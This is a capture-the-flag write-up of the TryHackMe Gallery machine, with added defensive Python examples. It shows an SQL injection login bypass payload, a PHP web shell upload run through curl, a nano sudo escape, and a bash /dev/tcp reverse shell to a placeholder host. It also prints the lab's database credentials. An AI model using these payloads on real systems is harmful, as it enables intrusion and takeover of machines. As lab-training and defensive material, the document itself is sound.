### Enumeration

I started by running Nmap, which showed two open ports, 80 and 8080; that answered the question about the ports.

```
# Nmap 7.92 scan initiated Sat Feb 12 22:32:01 2022 as: nmap -A -oN nmap-scan 10.10.112.90
Nmap scan report for 10.10.112.90
Host is up (0.36s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: Simple Image Gallery System
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 12 22:33:06 2022 -- 1 IP address (1 host up) scanned in 65.51 seconds
```

Opening port 80 in my browser just gave the default Apache page:

![](https://i.imgur.com/5czbvHq.png)

Next I opened the other port, 8080, which is a proxy; it redirected me to `https://ip/gallery/`, which has a login page:

![](https://i.imgur.com/YxuBjTg.png)

### Initial Access & Foothold

On the login page I tried SQLi with the payload `admin ' or 1=1 limit 1-- +'` and was logged in as administrator:

![](https://i.imgur.com/xZpwPRr.png)

Looking around the dashboard I found an upload field in the profile settings, so I uploaded a file, captured the request, and edited the file contents into a simple web shell:

```
[tahaafarooq@urchinsec-lab gallery]$ curl "http://10.10.118.206/gallery/uploads/1644852240_shell.php?0=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Now time to pop a shell:

![](https://i.imgur.com/qTti3tg.png)

Now that I had a shell, I went looking for configuration files, and I found
`config.php`, but it pulled its settings in from files in other folders:

```php
<?php
ob_start();
ini_set('date.timezone','Asia/Manila');
date_default_timezone_set('Asia/Manila');
session_start();
require_once('initialize.php');
require_once('classes/DBConnection.php');
require_once('classes/SystemSettings.php');
$db = new DBConnection;
$conn = $db->conn;
```

I found `DBConnection.php` in the `classes` folder, and it had the following:

```php
<?php
if(!defined('DB_SERVER')){
    require_once("../initialize.php");
}
class DBConnection{
    private $host = DB_SERVER;
    private $username = DB_USERNAME;
    private $password = DB_PASSWORD;
    private $database = DB_NAME;
    public $conn;

    public function __construct(){
        if (!isset($this->conn)) {
            $this->conn = new mysqli($this->host, $this->username, $this->password, $this->database);
            if (!$this->conn) {
                echo 'Cannot connect to database server';
                exit;
            }
        }
    }

    public function __destruct(){
        $this->conn->close();
    }
}
?>
```

which means the values of those constants are set in `initialize.php`:

```php
<?php
$dev_data = array('id'=>'-1','firstname'=>'Developer','lastname'=>'','username'=>'dev_oretnom','password'=>'5da283a2d990e8d8512cf967df5bc0d0','last_login'=>'','date_updated'=>'','date_added'=>'');
if(!defined('base_url')) define('base_url',"http://" . $_SERVER['SERVER_ADDR'] . "/gallery/");
if(!defined('base_app')) define('base_app', str_replace('\\','/',__DIR__).'/' );
if(!defined('dev_data')) define('dev_data',$dev_data);
if(!defined('DB_SERVER')) define('DB_SERVER',"localhost");
if(!defined('DB_USERNAME')) define('DB_USERNAME',"gallery_user");
if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"passw0rd321");
if(!defined('DB_NAME')) define('DB_NAME',"gallery_db");
?>
```

That gave me the MySQL credentials, plus the `$dev_data` array, which looks like the developer's account with its username and password hash. I answered question three by logging into MySQL and copying the admin user's hash!
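The login bypass used above works because the gallery splices the submitted username straight into its SQL text. The following is an added example, not code from the write-up or from the Simple Image Gallery System: it puts the vulnerable pattern beside the parameterised fix and runs the write-up's own payload through both. It assumes an in-memory sqlite3 table standing in for the app's MySQL `users` table and an unsalted MD5 password column (the same 32-hex-character shape as the hash in `initialize.php`); the demo password is a constructed value.

```python
import hashlib
import sqlite3
from typing import Optional

# Stand-in for the gallery's users table. Assumption: the real app is PHP on MySQL;
# an in-memory sqlite3 database is used here only so the example runs offline.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Unsalted MD5, the same shape as the 32-hex-character hash in initialize.php
    # (the password itself is a constructed demo value).
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                 ("admin", hashlib.md5(b"constructed-demo-password").hexdigest()))
    conn.commit()
    return conn

def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> Optional[int]:
    """Query text built by string formatting: the username is spliced into the SQL,
    so a quote inside it ends the literal and the rest is parsed as SQL."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = f"SELECT id FROM users WHERE username = '{username}' AND password = '{pw_hash}'"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None
    return row[0] if row else None

def safe_login(conn: sqlite3.Connection, username: str, password: str) -> Optional[int]:
    """Parameterised query: the username is bound as data and compared literally,
    quotes and all, so it can never change the structure of the statement."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = conn.execute("SELECT id FROM users WHERE username = ? AND password = ?",
                       (username, pw_hash)).fetchone()
    return row[0] if row else None

PAYLOAD = "admin ' or 1=1 limit 1-- +'"   # the bypass string used in the write-up

if __name__ == "__main__":
    db = make_db()
    # The payload turns the WHERE clause into  username = 'admin ' or 1=1 limit 1  and
    # comments out the password check, so the first user row (admin) comes back.
    print("vulnerable:", vulnerable_login(db, PAYLOAD, "anything"))             # 1
    print("safe:      ", safe_login(db, PAYLOAD, "anything"))                   # None
    print("safe, real:", safe_login(db, "admin", "constructed-demo-password"))  # 1
```

Binding the parameters closes the injection; the unsalted MD5 column is a separate weakness, since the `$dev_data` hash recovered from `initialize.php` is only as strong as the password behind it.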
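The foothold came from the profile-picture upload keeping a `.php` file under a predictable name (`1644852240_shell.php`) in a web-served `uploads/` directory. Here is an added example of the checks a hardened handler would make; it is not the gallery's code, and `validate_image_upload`, the size cap, and the hash-derived filename are my assumptions. It allowlists image extensions, verifies the file's magic bytes, and lets the server pick the stored name.

```python
import hashlib
import os
from typing import Tuple

# Image types the profile-picture field should accept, with the magic bytes each must start with.
IMAGE_MAGIC = {
    ".png":  (b"\x89PNG\r\n\x1a\n",),
    ".jpg":  (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif":  (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024   # assumption: a 2 MiB cap is plenty for a profile picture

def validate_image_upload(original_name: str, data: bytes) -> Tuple[bool, str]:
    """Return (True, stored_name) when the upload is accepted, else (False, reason)."""
    if not data or len(data) > MAX_BYTES:
        return False, "empty or oversized upload"
    base = os.path.basename(original_name)   # ignore any client-supplied directory part
    if "\x00" in base:
        return False, "NUL byte in filename"
    ext = os.path.splitext(base)[1].lower()
    if ext not in IMAGE_MAGIC:
        # Allowlist, not denylist: .php and every other non-image extension is refused.
        return False, f"extension {ext or '(none)'} not allowed"
    if not data.startswith(IMAGE_MAGIC[ext]):
        # A script renamed to shell.php.png still fails, because its bytes are not an image.
        return False, f"content does not look like {ext}"
    # Never keep the client's name: derive it from the content, so it is neither chosen
    # by the uploader nor guessable from a timestamp the way 1644852240_shell.php was.
    stored = hashlib.sha256(data).hexdigest()[:16] + ext
    return True, stored

# Constructed sample inputs (not files taken from the target).
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
PHP_STUB = b"<?php /* constructed stand-in for an uploaded script */ ?>"

if __name__ == "__main__":
    for name, blob in [("1644852240_shell.php", PHP_STUB),
                       ("shell.php.png", PHP_STUB),
                       ("../../photo.png", PNG_SAMPLE)]:
        print(f"{name!r:24} -> {validate_image_upload(name, blob)}")
```

Magic-byte checks do not stop a valid image that also carries script text, so the upload directory itself must be configured so nothing in it executes (with mod_php, `php_admin_flag engine off` in a `<Directory>` block for `uploads/`); the validator above is defence in depth on top of that.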
The first thing I did was upgrade the shell so it stops throwing those shell errors:

```bash
/usr/bin/script -qc /bin/bash /dev/null
# press Ctrl+Z to background the shell
stty raw -echo; fg
export TERM=xterm
```

```
www-data@gallery:/var/backups/mike_home_backup$ /usr/bin/script -qc /bin/bash /dev/null
<ome_backup$ /usr/bin/script -qc /bin/bash /dev/null
www-data@gallery:/var/backups/mike_home_backup$ ^Z
[1]+  Stopped                 nc -lnvp 1337
[tahaafarooq@urchinsec-lab urchinshell]$ stty raw -echo; fg
nc -lnvp 1337
export TERM=xterm
```

With the shell upgraded, I looked through `/var/backups` and found a backup of user `mike`'s home folder. I read its history and got the password from it:

```
www-data@gallery:/var/backups/mike_home_backup$ cat .bash_history
cat .bash_history
cd ~
ls
ping 1.1.1.1
cat /home/mike/user.txt
cd /var/www/
ls
cd html
ls -al
cat index.html
sudo -lb[REDACTED]x
clear
sudo -l
exit
```

I logged in:

```
www-data@gallery:/var/backups/mike_home_backup$ su mike
Password:
mike@gallery:/var/backups/mike_home_backup$ cd ~
mike@gallery:~$ ls
documents  images  user.txt
mike@gallery:~$ cat user.txt
THM{af05[REDACTED]46ef}
```

and there I got the user flag!

### Privilege Escalation

I first ran `sudo -l` to see which commands `mike` can run as `root`:

```
mike@gallery:~$ sudo -l
Matching Defaults entries for mike on gallery:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on gallery:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh
```

I read the file `/opt/rootkit.sh`:

```bash
#!/bin/bash
read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;

# Execute your choice
case $ans in
    versioncheck) /usr/bin/rkhunter --versioncheck ;;
    update) /usr/bin/rkhunter --update;;
    list) /usr/bin/rkhunter --list;;
    read) /bin/nano /root/report.txt;;
    *) exit;;
esac
```

From that script we can see that choosing the `read` option runs nano as root, which means nano can be used for privilege escalation. I can easily get a root shell here by typing the following:

![](https://i.imgur.com/6bORVhc.png)

```
^R^X [control+R + control+X]
reset; sh 1>&0 2>&0
```

![](https://i.imgur.com/T8JDo4f.png)

and from here I can type:

```bash
/bin/bash -c "bash -i &>/dev/tcp/tunip/port <&1"
```

Set a listener on your terminal and boom, you have a root shell:

```
[tahaafarooq@urchinsec-lab gallery]$ nc -lvnp 1122
Connection from 10.10.170.61:54522
root@gallery:~# id
id
uid=0(root) gid=0(root) groups=0(root)
```

And we have the flag:

```
root@gallery:/# cd root
cd root
root@gallery:/root# ls
ls
report.txt  root.txt
root@gallery:/root# cat root.txt
cat root.txt
THM{ba87e0[REDACTED]fde87}
```

contact: [tahaafarooq](https://twitter.com/tahaafarooq)

----

![](https://i.imgur.com/kOD5xfq.gif)
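Coming back to the privilege-escalation step: the `sudo -l` rule looked harmless because it only allowed one script, but that script hands the user an interactive editor running as root. Below is an added example of how a defender could audit for exactly that, not code from the write-up or from the target. `parse_sudo_l` reads the rules section of `sudo -l`, and when a rule is an interpreter plus a script, `audit_sudo` inspects the script's contents (supplied as a mapping of path to text) for programs that can break out to a shell. The `SHELL_CAPABLE` list is a short illustrative assumption, and the two input strings are copied from the write-up above.

```python
import os
import re
from typing import Dict, List

# Programs that hand an interactive user a shell or arbitrary file access once they run as
# root. Assumption: a short illustrative list, not a complete one.
SHELL_CAPABLE = {"nano", "vi", "vim", "less", "more", "man", "python", "python3", "perl", "bash", "sh"}
INTERPRETERS = {"bash", "sh", "dash"}

# One "(runas) TAG: command" line from the rules section of `sudo -l`.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")
# Absolute paths inside a shell script.
PATH_RE = re.compile(r"(?<![\w.-])/(?:[\w.-]+/)*[\w.-]+")

def parse_sudo_l(output: str) -> List[dict]:
    """Extract the rules that follow 'User X may run the following commands on Y:'."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if re.match(r"User \S+ may run the following commands", line):
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append({"runas": m["runas"].strip(),
                          "nopasswd": "NOPASSWD:" in m["tags"],
                          "cmd": m["cmd"]})
    return rules

def script_escapes(script: str) -> List[str]:
    """Shell-capable programs a script invokes by absolute path (the shebang line is ignored)."""
    found: List[str] = []
    for line in script.splitlines():
        if line.startswith("#!"):
            continue
        for path in PATH_RE.findall(line):
            name = os.path.basename(path)
            if name in SHELL_CAPABLE and name not in found:
                found.append(name)
    return found

def audit_sudo(output: str, scripts: Dict[str, str]) -> List[dict]:
    """Flag rules whose command, or the script an interpreter runs, reaches a shell-capable
    program. `scripts` maps script paths to their contents as read from the audited host."""
    findings = []
    for rule in parse_sudo_l(output):
        argv = rule["cmd"].split()
        prog = os.path.basename(argv[0])
        if prog in INTERPRETERS and len(argv) > 1:
            # "/bin/bash /opt/script.sh": the script is what really runs as root, so inspect it.
            target, escapes = argv[1], script_escapes(scripts.get(argv[1], ""))
        else:
            target, escapes = argv[0], ([prog] if prog in SHELL_CAPABLE else [])
        if escapes:
            findings.append({"runas": rule["runas"], "nopasswd": rule["nopasswd"],
                             "target": target, "escapes": escapes})
    return findings

# Inputs copied from the write-up above.
SUDO_L_OUTPUT = """\
Matching Defaults entries for mike on gallery:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User mike may run the following commands on gallery:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh
"""
ROOTKIT_SH = """\
#!/bin/bash
read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;

# Execute your choice
case $ans in
    versioncheck) /usr/bin/rkhunter --versioncheck ;;
    update) /usr/bin/rkhunter --update;;
    list) /usr/bin/rkhunter --list;;
    read) /bin/nano /root/report.txt;;
    *) exit;;
esac
"""

if __name__ == "__main__":
    for f in audit_sudo(SUDO_L_OUTPUT, {"/opt/rootkit.sh": ROOTKIT_SH}):
        print(f"{f['target']} runs as {f['runas']}"
              f"{' without a password' if f['nopasswd'] else ''} and calls: {', '.join(f['escapes'])}")
```

The finding points at the fix: a root-privileged wrapper should never launch an interactive editor, so the `read` branch belongs with a non-interactive viewer such as `cat`, and the script and `/opt` must not be writable by the user the rule is granted to.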